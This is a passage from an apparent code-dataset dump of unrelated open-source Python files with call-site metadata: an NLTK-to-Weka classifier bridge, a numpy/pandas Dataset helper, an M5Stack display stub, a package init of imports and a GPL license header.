'import numpy as np\n'), ((274, 63, 274, 85), 'numpy.argsort', 'np.argsort', ({(274, 74, 274, 84): 'rand_map_0'}, {}), '(rand_map_0)', True, 'import numpy as np\n'), ((361, 23, 361, 53), 'numpy.reshape', 'np.reshape', ({(361, 34, 361, 44): 'rand_map_0', (361, 46, 361, 52): '(-1, 1)'}, {}), '(rand_map_0, (-1, 1))', True, 'import numpy as np\n'), ((362, 23, 362, 53), 'numpy.reshape', 'np.reshape', ({(362, 34, 362, 44): 'rand_map_1', (362, 46, 362, 52): '(-1, 1)'}, {}), '(rand_map_1, (-1, 1))', True, 'import numpy as np\n'), ((363, 23, 363, 53), 'numpy.reshape', 'np.reshape', ({(363, 34, 363, 44): 'rand_map_2', (363, 46, 363, 52): '(-1, 1)'}, {}), '(rand_map_2, (-1, 1))', True, 'import numpy as np\n'), ((368, 20, 368, 57), 'numpy.reshape', 'np.reshape', ({(368, 31, 368, 48): 'rand_map_0_expand', (368, 50, 368, 56): '[-1, 1]'}, {}), '(rand_map_0_expand, [-1, 1])', True, 'import numpy as np\n'), ((370, 20, 370, 57), 'numpy.reshape', 'np.reshape', ({(370, 31, 370, 48): 'rand_map_1_expand', (370, 50, 370, 56): '[-1, 1]'}, {}), '(rand_map_1_expand, [-1, 1])', True, 'import numpy as np\n'), ((372, 20, 372, 57), 'numpy.reshape', 'np.reshape', ({(372, 31, 372, 48): 'rand_map_2_expand', (372, 50, 372, 56): '[-1, 1]'}, {}), '(rand_map_2_expand, [-1, 1])', True, 'import numpy as np\n'), ((375, 13, 375, 38), 'numpy.array', 'np.array', ({(375, 22, 375, 37): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((446, 15, 446, 40), 'numpy.array', 'np.array', ({(446, 24, 446, 39): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((448, 63, 448, 85), 'numpy.argsort', 'np.argsort', ({(448, 74, 448, 84): 'rand_map_0'}, {}), '(rand_map_0)', True, 'import numpy as np\n'), ((535, 23, 535, 53), 'numpy.reshape', 'np.reshape', ({(535, 34, 535, 44): 'rand_map_0', (535, 46, 535, 52): '(-1, 1)'}, {}), '(rand_map_0, (-1, 1))', True, 'import numpy as np\n'), ((536, 23, 536, 53), 'numpy.reshape', 'np.reshape', ({(536, 34, 536, 44): 'rand_map_1', (536, 46, 536, 52): '(-1, 1)'}, {}), '(rand_map_1, (-1, 1))', True, 'import numpy as np\n'), ((537, 23, 537, 53), 'numpy.reshape', 'np.reshape', ({(537, 34, 537, 44): 'rand_map_2', (537, 46, 537, 52): '(-1, 1)'}, {}), '(rand_map_2, (-1, 1))', True, 'import numpy as np\n'), ((542, 20, 542, 57), 'numpy.reshape', 'np.reshape', ({(542, 31, 542, 48): 'rand_map_0_expand', (542, 50, 542, 56): '[-1, 1]'}, {}), '(rand_map_0_expand, [-1, 1])', True, 'import numpy as np\n'), ((544, 20, 544, 57), 'numpy.reshape', 'np.reshape', ({(544, 31, 544, 48): 'rand_map_1_expand', (544, 50, 544, 56): '[-1, 1]'}, {}), '(rand_map_1_expand, [-1, 1])', True, 'import numpy as np\n'), ((546, 20, 546, 57), 'numpy.reshape', 'np.reshape', ({(546, 31, 546, 48): 'rand_map_2_expand', (546, 50, 546, 56): '[-1, 1]'}, {}), '(rand_map_2_expand, [-1, 1])', True, 'import numpy as np\n'), ((549, 13, 549, 38), 'numpy.array', 'np.array', ({(549, 22, 549, 37): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((620, 15, 620, 40), 'numpy.array', 'np.array', ({(620, 24, 620, 39): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((622, 63, 622, 85), 'numpy.argsort', 'np.argsort', ({(622, 74, 622, 84): 'rand_map_0'}, {}), '(rand_map_0)', True, 'import numpy as np\n'), ((709, 23, 709, 53), 'numpy.reshape', 'np.reshape', ({(709, 34, 709, 44): 'rand_map_0', (709, 46, 709, 52): '(-1, 1)'}, {}), '(rand_map_0, (-1, 1))', True, 'import numpy as np\n'), ((710, 23, 710, 53), 'numpy.reshape', 'np.reshape', ({(710, 34, 710, 44): 
'rand_map_1', (710, 46, 710, 52): '(-1, 1)'}, {}), '(rand_map_1, (-1, 1))', True, 'import numpy as np\n'), ((711, 23, 711, 53), 'numpy.reshape', 'np.reshape', ({(711, 34, 711, 44): 'rand_map_2', (711, 46, 711, 52): '(-1, 1)'}, {}), '(rand_map_2, (-1, 1))', True, 'import numpy as np\n'), ((716, 20, 716, 57), 'numpy.reshape', 'np.reshape', ({(716, 31, 716, 48): 'rand_map_0_expand', (716, 50, 716, 56): '[-1, 1]'}, {}), '(rand_map_0_expand, [-1, 1])', True, 'import numpy as np\n'), ((718, 20, 718, 57), 'numpy.reshape', 'np.reshape', ({(718, 31, 718, 48): 'rand_map_1_expand', (718, 50, 718, 56): '[-1, 1]'}, {}), '(rand_map_1_expand, [-1, 1])', True, 'import numpy as np\n'), ((720, 20, 720, 57), 'numpy.reshape', 'np.reshape', ({(720, 31, 720, 48): 'rand_map_2_expand', (720, 50, 720, 56): '[-1, 1]'}, {}), '(rand_map_2_expand, [-1, 1])', True, 'import numpy as np\n'), ((723, 13, 723, 38), 'numpy.array', 'np.array', ({(723, 22, 723, 37): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((27, 58, 27, 83), 'numpy.array', 'np.array', ({(27, 67, 27, 82): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((201, 58, 201, 83), 'numpy.array', 'np.array', ({(201, 67, 201, 82): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((375, 58, 375, 83), 'numpy.array', 'np.array', ({(375, 67, 375, 82): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((549, 58, 549, 83), 'numpy.array', 'np.array', ({(549, 67, 549, 82): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((723, 58, 723, 83), 'numpy.array', 'np.array', ({(723, 67, 723, 82): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n')]
wangyum/anaconda
pkgs/nltk-3.2-py27_0/lib/python2.7/site-packages/nltk/classify/weka.py
6e5a0dbead3327661d73a61e85414cf92aa52be6
# Natural Language Toolkit: Interface to Weka Classsifiers # # Copyright (C) 2001-2015 NLTK Project # Author: Edward Loper <[email protected]> # URL: <http://nltk.org/> # For license information, see LICENSE.TXT """ Classifiers that make use of the external 'Weka' package. """ from __future__ import print_function import time import tempfile import os import subprocess import re import zipfile from sys import stdin from nltk import compat from nltk.probability import DictionaryProbDist from nltk.internals import java, config_java from nltk.classify.api import ClassifierI _weka_classpath = None _weka_search = ['.', '/usr/share/weka', '/usr/local/share/weka', '/usr/lib/weka', '/usr/local/lib/weka',] def config_weka(classpath=None): global _weka_classpath # Make sure java's configured first. config_java() if classpath is not None: _weka_classpath = classpath if _weka_classpath is None: searchpath = _weka_search if 'WEKAHOME' in os.environ: searchpath.insert(0, os.environ['WEKAHOME']) for path in searchpath: if os.path.exists(os.path.join(path, 'weka.jar')): _weka_classpath = os.path.join(path, 'weka.jar') version = _check_weka_version(_weka_classpath) if version: print(('[Found Weka: %s (version %s)]' % (_weka_classpath, version))) else: print('[Found Weka: %s]' % _weka_classpath) _check_weka_version(_weka_classpath) if _weka_classpath is None: raise LookupError('Unable to find weka.jar! Use config_weka() ' 'or set the WEKAHOME environment variable. ' 'For more information about Weka, please see ' 'http://www.cs.waikato.ac.nz/ml/weka/') def _check_weka_version(jar): try: zf = zipfile.ZipFile(jar) except SystemExit as KeyboardInterrupt: raise except: return None try: try: return zf.read('weka/core/version.txt') except KeyError: return None finally: zf.close() class WekaClassifier(ClassifierI): def __init__(self, formatter, model_filename): self._formatter = formatter self._model = model_filename def prob_classify_many(self, featuresets): return self._classify_many(featuresets, ['-p', '0', '-distribution']) def classify_many(self, featuresets): return self._classify_many(featuresets, ['-p', '0']) def _classify_many(self, featuresets, options): # Make sure we can find java & weka. config_weka() temp_dir = tempfile.mkdtemp() try: # Write the test data file. test_filename = os.path.join(temp_dir, 'test.arff') self._formatter.write(test_filename, featuresets) # Call weka to classify the data. cmd = ['weka.classifiers.bayes.NaiveBayes', '-l', self._model, '-T', test_filename] + options (stdout, stderr) = java(cmd, classpath=_weka_classpath, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # Check if something went wrong: if stderr and not stdout: if 'Illegal options: -distribution' in stderr: raise ValueError('The installed version of weka does ' 'not support probability distribution ' 'output.') else: raise ValueError('Weka failed to generate output:\n%s' % stderr) # Parse weka's output. 
return self.parse_weka_output(stdout.decode(stdin.encoding).split('\n')) finally: for f in os.listdir(temp_dir): os.remove(os.path.join(temp_dir, f)) os.rmdir(temp_dir) def parse_weka_distribution(self, s): probs = [float(v) for v in re.split('[*,]+', s) if v.strip()] probs = dict(zip(self._formatter.labels(), probs)) return DictionaryProbDist(probs) def parse_weka_output(self, lines): # Strip unwanted text from stdout for i,line in enumerate(lines): if line.strip().startswith("inst#"): lines = lines[i:] break if lines[0].split() == ['inst#', 'actual', 'predicted', 'error', 'prediction']: return [line.split()[2].split(':')[1] for line in lines[1:] if line.strip()] elif lines[0].split() == ['inst#', 'actual', 'predicted', 'error', 'distribution']: return [self.parse_weka_distribution(line.split()[-1]) for line in lines[1:] if line.strip()] # is this safe:? elif re.match(r'^0 \w+ [01]\.[0-9]* \?\s*$', lines[0]): return [line.split()[1] for line in lines if line.strip()] else: for line in lines[:10]: print(line) raise ValueError('Unhandled output format -- your version ' 'of weka may not be supported.\n' ' Header: %s' % lines[0]) # [xx] full list of classifiers (some may be abstract?): # ADTree, AODE, BayesNet, ComplementNaiveBayes, ConjunctiveRule, # DecisionStump, DecisionTable, HyperPipes, IB1, IBk, Id3, J48, # JRip, KStar, LBR, LeastMedSq, LinearRegression, LMT, Logistic, # LogisticBase, M5Base, MultilayerPerceptron, # MultipleClassifiersCombiner, NaiveBayes, NaiveBayesMultinomial, # NaiveBayesSimple, NBTree, NNge, OneR, PaceRegression, PART, # PreConstructedLinearModel, Prism, RandomForest, # RandomizableClassifier, RandomTree, RBFNetwork, REPTree, Ridor, # RuleNode, SimpleLinearRegression, SimpleLogistic, # SingleClassifierEnhancer, SMO, SMOreg, UserClassifier, VFI, # VotedPerceptron, Winnow, ZeroR _CLASSIFIER_CLASS = { 'naivebayes': 'weka.classifiers.bayes.NaiveBayes', 'C4.5': 'weka.classifiers.trees.J48', 'log_regression': 'weka.classifiers.functions.Logistic', 'svm': 'weka.classifiers.functions.SMO', 'kstar': 'weka.classifiers.lazy.KStar', 'ripper': 'weka.classifiers.rules.JRip', } @classmethod def train(cls, model_filename, featuresets, classifier='naivebayes', options=[], quiet=True): # Make sure we can find java & weka. config_weka() # Build an ARFF formatter. formatter = ARFF_Formatter.from_train(featuresets) temp_dir = tempfile.mkdtemp() try: # Write the training data file. train_filename = os.path.join(temp_dir, 'train.arff') formatter.write(train_filename, featuresets) if classifier in cls._CLASSIFIER_CLASS: javaclass = cls._CLASSIFIER_CLASS[classifier] elif classifier in cls._CLASSIFIER_CLASS.values(): javaclass = classifier else: raise ValueError('Unknown classifier %s' % classifier) # Train the weka model. cmd = [javaclass, '-d', model_filename, '-t', train_filename] cmd += list(options) if quiet: stdout = subprocess.PIPE else: stdout = None java(cmd, classpath=_weka_classpath, stdout=stdout) # Return the new classifier. return WekaClassifier(formatter, model_filename) finally: for f in os.listdir(temp_dir): os.remove(os.path.join(temp_dir, f)) os.rmdir(temp_dir) class ARFF_Formatter: """ Converts featuresets and labeled featuresets to ARFF-formatted strings, appropriate for input into Weka. Features and classes can be specified manually in the constructor, or may be determined from data using ``from_train``. """ def __init__(self, labels, features): """ :param labels: A list of all class labels that can be generated. 
:param features: A list of feature specifications, where each feature specification is a tuple (fname, ftype); and ftype is an ARFF type string such as NUMERIC or STRING. """ self._labels = labels self._features = features def format(self, tokens): """Returns a string representation of ARFF output for the given data.""" return self.header_section() + self.data_section(tokens) def labels(self): """Returns the list of classes.""" return list(self._labels) def write(self, outfile, tokens): """Writes ARFF data to a file for the given data.""" if not hasattr(outfile, 'write'): outfile = open(outfile, 'w') outfile.write(self.format(tokens)) outfile.close() @staticmethod def from_train(tokens): """ Constructs an ARFF_Formatter instance with class labels and feature types determined from the given data. Handles boolean, numeric and string (note: not nominal) types. """ # Find the set of all attested labels. labels = set(label for (tok, label) in tokens) # Determine the types of all features. features = {} for tok, label in tokens: for (fname, fval) in tok.items(): if issubclass(type(fval), bool): ftype = '{True, False}' elif issubclass(type(fval), (compat.integer_types, float, bool)): ftype = 'NUMERIC' elif issubclass(type(fval), compat.string_types): ftype = 'STRING' elif fval is None: continue # can't tell the type. else: raise ValueError('Unsupported value type %r' % ftype) if features.get(fname, ftype) != ftype: raise ValueError('Inconsistent type for %s' % fname) features[fname] = ftype features = sorted(features.items()) return ARFF_Formatter(labels, features) def header_section(self): """Returns an ARFF header as a string.""" # Header comment. s = ('% Weka ARFF file\n' + '% Generated automatically by NLTK\n' + '%% %s\n\n' % time.ctime()) # Relation name s += '@RELATION rel\n\n' # Input attribute specifications for fname, ftype in self._features: s += '@ATTRIBUTE %-30r %s\n' % (fname, ftype) # Label attribute specification s += '@ATTRIBUTE %-30r {%s}\n' % ('-label-', ','.join(self._labels)) return s def data_section(self, tokens, labeled=None): """ Returns the ARFF data section for the given data. :param tokens: a list of featuresets (dicts) or labelled featuresets which are tuples (featureset, label). :param labeled: Indicates whether the given tokens are labeled or not. If None, then the tokens will be assumed to be labeled if the first token's value is a tuple or list. """ # Check if the tokens are labeled or unlabeled. If unlabeled, # then use 'None' if labeled is None: labeled = tokens and isinstance(tokens[0], (tuple, list)) if not labeled: tokens = [(tok, None) for tok in tokens] # Data section s = '\n@DATA\n' for (tok, label) in tokens: for fname, ftype in self._features: s += '%s,' % self._fmt_arff_val(tok.get(fname)) s += '%s\n' % self._fmt_arff_val(label) return s def _fmt_arff_val(self, fval): if fval is None: return '?' elif isinstance(fval, (bool, compat.integer_types)): return '%s' % fval elif isinstance(fval, float): return '%r' % fval else: return '%r' % fval if __name__ == '__main__': from nltk.classify.util import names_demo, binary_names_demo_features def make_classifier(featuresets): return WekaClassifier.train('/tmp/name.model', featuresets, 'C4.5') classifier = names_demo(make_classifier, binary_names_demo_features)
[((36, 4, 36, 17), 'nltk.internals.config_java', 'config_java', ({}, {}), '()', False, 'from nltk.internals import java, config_java\n'), ((345, 17, 345, 72), 'nltk.classify.util.names_demo', 'names_demo', ({(345, 28, 345, 43): 'make_classifier', (345, 45, 345, 71): 'binary_names_demo_features'}, {}), '(make_classifier, binary_names_demo_features)', False, 'from nltk.classify.util import names_demo, binary_names_demo_features\n'), ((65, 13, 65, 33), 'zipfile.ZipFile', 'zipfile.ZipFile', ({(65, 29, 65, 32): 'jar'}, {}), '(jar)', False, 'import zipfile\n'), ((93, 19, 93, 37), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ({}, {}), '()', False, 'import tempfile\n'), ((127, 15, 127, 40), 'nltk.probability.DictionaryProbDist', 'DictionaryProbDist', ({(127, 34, 127, 39): 'probs'}, {}), '(probs)', False, 'from nltk.probability import DictionaryProbDist\n'), ((187, 19, 187, 37), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ({}, {}), '()', False, 'import tempfile\n'), ((96, 28, 96, 63), 'os.path.join', 'os.path.join', ({(96, 41, 96, 49): 'temp_dir', (96, 51, 96, 62): '"""test.arff"""'}, {}), "(temp_dir, 'test.arff')", False, 'import os\n'), ((102, 31, 104, 59), 'nltk.internals.java', 'java', (), '', False, 'from nltk.internals import java, config_java\n'), ((120, 21, 120, 41), 'os.listdir', 'os.listdir', ({(120, 32, 120, 40): 'temp_dir'}, {}), '(temp_dir)', False, 'import os\n'), ((122, 12, 122, 30), 'os.rmdir', 'os.rmdir', ({(122, 21, 122, 29): 'temp_dir'}, {}), '(temp_dir)', False, 'import os\n'), ((190, 29, 190, 65), 'os.path.join', 'os.path.join', ({(190, 42, 190, 50): 'temp_dir', (190, 52, 190, 64): '"""train.arff"""'}, {}), "(temp_dir, 'train.arff')", False, 'import os\n'), ((206, 12, 206, 63), 'nltk.internals.java', 'java', (), '', False, 'from nltk.internals import java, config_java\n'), ((212, 21, 212, 41), 'os.listdir', 'os.listdir', ({(212, 32, 212, 40): 'temp_dir'}, {}), '(temp_dir)', False, 'import os\n'), ((214, 12, 214, 30), 'os.rmdir', 'os.rmdir', ({(214, 21, 214, 29): 'temp_dir'}, {}), '(temp_dir)', False, 'import os\n'), ((47, 30, 47, 60), 'os.path.join', 'os.path.join', ({(47, 43, 47, 47): 'path', (47, 49, 47, 59): '"""weka.jar"""'}, {}), "(path, 'weka.jar')", False, 'import os\n'), ((48, 34, 48, 64), 'os.path.join', 'os.path.join', ({(48, 47, 48, 51): 'path', (48, 53, 48, 63): '"""weka.jar"""'}, {}), "(path, 'weka.jar')", False, 'import os\n'), ((125, 35, 125, 55), 're.split', 're.split', ({(125, 44, 125, 51): '"""[*,]+"""', (125, 53, 125, 54): 's'}, {}), "('[*,]+', s)", False, 'import re\n'), ((146, 13, 146, 62), 're.match', 're.match', ({(146, 22, 146, 51): '"""^0 \\\\w+ [01]\\\\.[0-9]* \\\\?\\\\s*$"""', (146, 53, 146, 61): 'lines[0]'}, {}), "('^0 \\\\w+ [01]\\\\.[0-9]* \\\\?\\\\s*$', lines[0])", False, 'import re\n'), ((289, 27, 289, 39), 'time.ctime', 'time.ctime', ({}, {}), '()', False, 'import time\n'), ((121, 26, 121, 51), 'os.path.join', 'os.path.join', ({(121, 39, 121, 47): 'temp_dir', (121, 49, 121, 50): 'f'}, {}), '(temp_dir, f)', False, 'import os\n'), ((213, 26, 213, 51), 'os.path.join', 'os.path.join', ({(213, 39, 213, 47): 'temp_dir', (213, 49, 213, 50): 'f'}, {}), '(temp_dir, f)', False, 'import os\n')]
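Editorial note (not part of the recorded snapshot above): the entry documents NLTK's bridge to Weka. A minimal sketch of how that bridge is typically driven, assuming NLTK plus a local Java/weka.jar install; the feature dicts and model path are invented for the example.

# Illustrative sketch only; requires Java and weka.jar (found via WEKAHOME or a common install path).
from nltk.classify import weka

# Toy labelled featuresets: (feature dict, label) pairs.
train = [({"last_letter": "a", "length": 5}, "female"),
         ({"last_letter": "k", "length": 4}, "male")]
test = [{"last_letter": "e", "length": 6}]

# train() writes the data as ARFF, shells out to weka, and stores the model at the given path.
classifier = weka.WekaClassifier.train("/tmp/names.model", train, "naivebayes")
print(classifier.classify_many(test))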
pg428/SIB
src/si/data/dataset.py
b887c2011eb3a04d119a93b3932785d182e331d3
import pandas as pd import numpy as np from src.si.util.util import label_gen __all__ = ['Dataset'] class Dataset: def __init__(self, X=None, Y=None, xnames: list = None, yname: str = None): """ Tabular Dataset""" if X is None: raise Exception("Trying to instanciate a DataSet without any data") self.X = X self.Y = Y self.xnames = xnames if xnames else label_gen(X.shape[1]) self.yname = yname if yname else 'Y' @classmethod def from_data(cls, filename, sep=",", labeled=True): """Creates a DataSet from a data file. :param filename: The filename :type filename: str :param sep: attributes separator, defaults to "," :type sep: str, optional :return: A DataSet object :rtype: DataSet """ data = np.genfromtxt(filename, delimiter=sep) if labeled: X = data[:, 0:-1] Y = data[:, -1] else: X = data Y = None return cls(X, Y) @classmethod def from_dataframe(cls, df, ylabel=None): """Creates a DataSet from a pandas dataframe. :param df: [description] :type df: [type] :param ylabel: [description], defaults to None :type ylabel: [type], optional :return: [description] :rtype: [type] """ if ylabel and ylabel in df.columns: X = df.loc[:, df.columns != ylabel].to_numpy() #transforma num array de numpy Y = df.loc[:, ylabel].to_numpy() # xnames = df.columns.tolist().remove(ylabel) yname = ylabel xnames = df.columns.tolist() for name in xnames: if name == yname: xnames.remove(yname) else: X = df.to_numpy() Y = None xnames = df.columns.tolist() yname = None return cls(X, Y, xnames, yname) def __len__(self): """Returns the number of data points.""" return self.X.shape[0] def hasLabel(self): """Returns True if the dataset constains labels (a dependent variable)""" return self.Y is not None def getNumFeatures(self): """Returns the number of features""" return self.X.shape[1] def getNumClasses(self): """Returns the number of label classes or 0 if the dataset has no dependent variable.""" return len(np.unique(self.Y)) if self.hasLabel() else 0 def writeDataset(self, filename, sep=","): """Saves the dataset to a file :param filename: The output file path :type filename: str :param sep: The fields separator, defaults to "," :type sep: str, optional """ fullds = np.hstack((self.X, self.Y.reshape(len(self.Y), 1))) np.savetxt(filename, fullds, delimiter=sep) def toDataframe(self): """ Converts the dataset into a pandas DataFrame""" if self.hasLabel(): df = pd.DataFrame(np.hstack((self.X, self.Y.reshape(len(self.Y), 1))), columns=self.xnames[:]+[self.yname]) #columns=np.hstack((self.xnames, self.yname))) else: df = pd.DataFrame(self.X.copy(), columns=self.xnames[:]) return df def getXy(self): return self.X, self.Y def summary(dataset, format='df'): """ Returns the statistics of a dataset(mean, std, max, min) :param dataset: A Dataset object :type dataset: si.data.Dataset :param format: Output format ('df':DataFrame, 'dict':dictionary ), defaults to 'df' :type format: str, optional """ if format not in ["df", "dict"]: raise Exception("Invalid format. 
Choose between 'df' and 'dict'.") if dataset.hasLabel(): data = np.hstack((dataset.X, dataset.Y.reshape(len(dataset.Y), 1))) #data = np.hstack([dataset.X, np.reshape(dataset.Y, (-1, 1))]) columns = dataset.xnames[:] + [dataset.yname] else: data = dataset.X columns = dataset.xnames[:] stats = {} if type(dataset.Y[0]) is str: for i in range(data.shape[1]-1): #ve colunas _means = np.mean(data[:, i], axis=0) _vars = np.var(data[:, i], axis=0) _maxs = np.max(data[:, i], axis=0) _mins = np.min(data[:, i], axis=0) stat = {"mean": _means, "var": _vars, "max": _maxs, "min": _mins } stats[columns[i]] = stat else: for i in range(data.shape[1]): # ve colunas _means = np.mean(data[:, i], axis=0) _vars = np.var(data[:, i], axis=0) _maxs = np.max(data[:, i], axis=0) _mins = np.min(data[:, i], axis=0) stat = {"mean": _means, "var": _vars, "max": _maxs, "min": _mins } stats[columns[i]] = stat # _means = np.mean(data, axis=0) # _vars = np.var(data, axis=0) # _maxs = np.max(data, axis=0) # _mins = np.min(data, axis=0) # stats = {} # for i in range(data.shape[1]): # stat = {"mean": _means[i], # "var": _vars[i], # "max": _maxs[i], # "min": _mins[i] # } # stats[columns[i]] = stat if format == "dict": return stats else: return pd.DataFrame(stats)
[((30, 15, 30, 53), 'numpy.genfromtxt', 'np.genfromtxt', (), '', True, 'import numpy as np\n'), ((95, 8, 95, 51), 'numpy.savetxt', 'np.savetxt', (), '', True, 'import numpy as np\n'), ((169, 15, 169, 34), 'pandas.DataFrame', 'pd.DataFrame', ({(169, 28, 169, 33): 'stats'}, {}), '(stats)', True, 'import pandas as pd\n'), ((16, 44, 16, 65), 'src.si.util.util.label_gen', 'label_gen', ({(16, 54, 16, 64): 'X.shape[1]'}, {}), '(X.shape[1])', False, 'from src.si.util.util import label_gen\n'), ((129, 21, 129, 48), 'numpy.mean', 'np.mean', (), '', True, 'import numpy as np\n'), ((130, 20, 130, 46), 'numpy.var', 'np.var', (), '', True, 'import numpy as np\n'), ((131, 20, 131, 46), 'numpy.max', 'np.max', (), '', True, 'import numpy as np\n'), ((132, 20, 132, 46), 'numpy.min', 'np.min', (), '', True, 'import numpy as np\n'), ((142, 21, 142, 48), 'numpy.mean', 'np.mean', (), '', True, 'import numpy as np\n'), ((143, 20, 143, 46), 'numpy.var', 'np.var', (), '', True, 'import numpy as np\n'), ((144, 20, 144, 46), 'numpy.max', 'np.max', (), '', True, 'import numpy as np\n'), ((145, 20, 145, 46), 'numpy.min', 'np.min', (), '', True, 'import numpy as np\n'), ((83, 19, 83, 36), 'numpy.unique', 'np.unique', ({(83, 29, 83, 35): 'self.Y'}, {}), '(self.Y)', True, 'import numpy as np\n')]
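Editorial note (not part of the recorded snapshot above): a minimal usage sketch of the Dataset class recorded in this entry, assuming the repository's src package is importable from its root; the dataframe values are invented.

# Illustrative sketch only.
import pandas as pd
from src.si.data.dataset import Dataset, summary

df = pd.DataFrame({"x1": [1.0, 2.0, 3.0],
                   "x2": [0.5, 0.1, 0.9],
                   "label": [0, 1, 0]})
ds = Dataset.from_dataframe(df, ylabel="label")
print(len(ds), ds.getNumFeatures(), ds.hasLabel())   # 3 2 True
print(summary(ds))                                    # per-column mean/var/max/min as a DataFrame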
RonaldHiemstra/micropython-stubs
stubs/m5stack_flowui-1_4_0-beta/display.py
d97f879b01f6687baaebef1c7e26a80909c3cff3
""" Module: 'display' on M5 FlowUI v1.4.0-beta """ # MCU: (sysname='esp32', nodename='esp32', release='1.11.0', version='v1.11-284-g5d8e1c867 on 2019-08-30', machine='ESP32 module with ESP32') # Stubber: 1.3.1 class TFT: '' BLACK = 0 BLUE = 255 BMP = 2 BOTTOM = -9004 CENTER = -9003 COLOR_BITS16 = 16 COLOR_BITS24 = 24 CYAN = 65535 DARKCYAN = 32896 DARKGREEN = 32768 DARKGREY = 8421504 FONT_7seg = 9 FONT_Comic = 4 FONT_Default = 0 FONT_DefaultSmall = 8 FONT_DejaVu18 = 1 FONT_DejaVu24 = 2 FONT_DejaVu40 = 11 FONT_DejaVu56 = 12 FONT_DejaVu72 = 13 FONT_Minya = 5 FONT_Small = 7 FONT_Tooney = 6 FONT_Ubuntu = 3 GREEN = 65280 GREENYELLOW = 11336748 HSPI = 1 JPG = 1 LANDSCAPE = 1 LANDSCAPE_FLIP = 3 LASTX = 7000 LASTY = 8000 LIGHTGREY = 12632256 M5STACK = 6 MAGENTA = 16515327 MAROON = 8388608 NAVY = 128 OLIVE = 8421376 ORANGE = 16557056 PINK = 16564426 PORTRAIT = 0 PORTRAIT_FLIP = 2 PURPLE = 8388736 RED = 16515072 RIGHT = -9004 VSPI = 2 WHITE = 16579836 YELLOW = 16579584 def arc(): pass def attrib7seg(): pass def backlight(): pass def circle(): pass def clear(): pass def clearwin(): pass def compileFont(): pass def deinit(): pass def drawCircle(): pass def drawLine(): pass def drawPixel(): pass def drawRect(): pass def drawRoundRect(): pass def drawTriangle(): pass def ellipse(): pass def fill(): pass def fillCircle(): pass def fillRect(): pass def fillRoundRect(): pass def fillScreen(): pass def fillTriangle(): pass def font(): pass def fontSize(): pass def getCursor(): pass def get_bg(): pass def get_fg(): pass def hsb2rgb(): pass def image(): pass def init(): pass def line(): pass def lineByAngle(): pass def orient(): pass def pixel(): pass def polygon(): pass def print(): pass def println(): pass def qrcode(): pass def rect(): pass def resetwin(): pass def restorewin(): pass def roundrect(): pass def savewin(): pass def screensize(): pass def setBrightness(): pass def setColor(): pass def setCursor(): pass def setRotation(): pass def setTextColor(): pass def set_bg(): pass def set_fg(): pass def setwin(): pass def text(): pass def textClear(): pass def textWidth(): pass def text_x(): pass def text_y(): pass def tft_deselect(): pass def tft_readcmd(): pass def tft_select(): pass def tft_setspeed(): pass def tft_writecmd(): pass def tft_writecmddata(): pass def triangle(): pass def winsize(): pass
[]
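Editorial note (not part of the recorded stub above): the stub only lists names, so the sketch below shows roughly how the corresponding on-device API is used. It assumes M5Stack UIFlow firmware, where an already-initialised display.TFT instance is exposed as m5stack.lcd; coordinates, colours and the exact call signatures are assumptions, not taken from the stub.

# Illustrative sketch only; run on-device under UIFlow firmware.
from m5stack import lcd   # assumed to be a ready-to-use display.TFT instance

lcd.clear(lcd.BLACK)
lcd.font(lcd.FONT_DejaVu24)
lcd.text(lcd.CENTER, 100, "Hello, M5Stack!", lcd.YELLOW)
lcd.circle(160, 180, 40, lcd.GREEN)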
dmoore247/db-migration
dbclient/__init__.py
cc75d491d7dd7e9e24b5a35dd3d1080317b25520
import json, requests, datetime
from cron_descriptor import get_description
from .dbclient import dbclient
from .JobsClient import JobsClient
from .ClustersClient import ClustersClient
from .WorkspaceClient import WorkspaceClient
from .ScimClient import ScimClient
from .LibraryClient import LibraryClient
from .HiveClient import HiveClient
from .parser import *
[]
peerke88/SkinningTools
UI/ControlSlider/__init__.py
db761f569ba179231dc64183ebfca1684429ab96
# -*- coding: utf-8 -*-
# SkinWeights command and component editor
# Copyright (C) 2018 Trevor van Hoof
# Website: http://www.trevorius.com
#
# pyqt attribute sliders
# Copyright (C) 2018 Daniele Niero
# Website: http://danieleniero.com/
#
# neighbour finding algorithm
# Copyright (C) 2018 Jan Pijpers
# Website: http://www.janpijpers.com/
#
# skinningTools and UI
# Copyright (C) 2018 Perry Leijten
# Website: http://www.perryleijten.com
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# See http://www.gnu.org/licenses/gpl.html for a copy of the GNU General
# Public License.
# --------------------------------------------------------------------------------------
[]
EuleMitKeule/core
homeassistant/components/fritz/sensor.py
3af54d96c7dcc3f7087d1196e6ab0db029301ee7
